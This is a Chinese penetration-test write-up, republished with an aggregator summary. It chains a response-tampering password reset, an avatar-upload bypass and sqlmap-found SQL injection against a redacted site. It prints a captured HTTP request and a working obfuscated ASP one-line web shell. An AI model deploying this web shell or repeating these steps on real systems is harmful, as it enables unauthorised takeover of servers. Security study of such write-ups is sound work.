文章总结: 这篇文章详细描述了一次渗透测试过程,从发现任意用户密码重置漏洞开始,通过修改返回包为success成功重置管理员密码,然后利用头像上传功能上传ASP一句话木马获取服务器shell,最后还发现了多个SQL注入漏洞。文章展示了如何利用多个漏洞链式攻击,最终获得系统控制权,是典型的渗透测试实战案例。
综合评分: 82
文章分类: 渗透测试,WEB安全,漏洞分析,实战经验,漏洞POC
记一次从任意用户密码重置到多个sql到getshell
原创
安全小生
安全小生
2025年12月7日 09:00
江西
#
任意用户密码重置
例如 重置管理员账户密码
输入admin 下一步
虽然是后四位 可以直接爆破 但是这里不用 直接随便输入一个抓包
GET /ajax/Users/xxxxxxxxxxxs.aspx?LoginName=admin&Panswer=1111 HTTP/1.1 Host: xxxxxxxxxxxxxx User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded Accept: /Referer: xxxxxxxxxxxxxxxxxxxxx Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Cookie: ASP.NET_SessionId=du0gw5bpvjkg3gnuagelkn2d Connection: keep-alive
把返回包的数据修改为success
输入密码 修改成功
他这个个人社区的账户是和后台管理的账户是绑定的
账户密码是一样的
登入成功 进而可以修改网站的所有配置
#
getshell
更新头像处
因为上传的返回包不会返回路径 先上传一个正常的图片 获得路径
然后再抓一个上传正常的图片的包 上传asp 在图片末尾加入一句话
<% Class C8Ch Public Property Let SXEWH(Db4X836F5) Execute Left(Db4X836F5, 9999) End Property End Class Set a = New C8Ch a.SXEWH = Request("shell") %>
上传成功 http://xxxxxxxx/xxxxxx/xxxxx/admin.asp
也是用蚁剑成功连接
大量sql注入
抓此处检索的包
发现单引号报错
这边图方便 直接sqlmap 一把梭
最终也是找到了三个接口存在sql注入
最后也是共计拿下12rank
欢迎各位师傅关注”安全小生“,小生会不定时更新实战案例
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:安全小生 安全小生《记一次从任意用户密码重置到多个sql到getshell》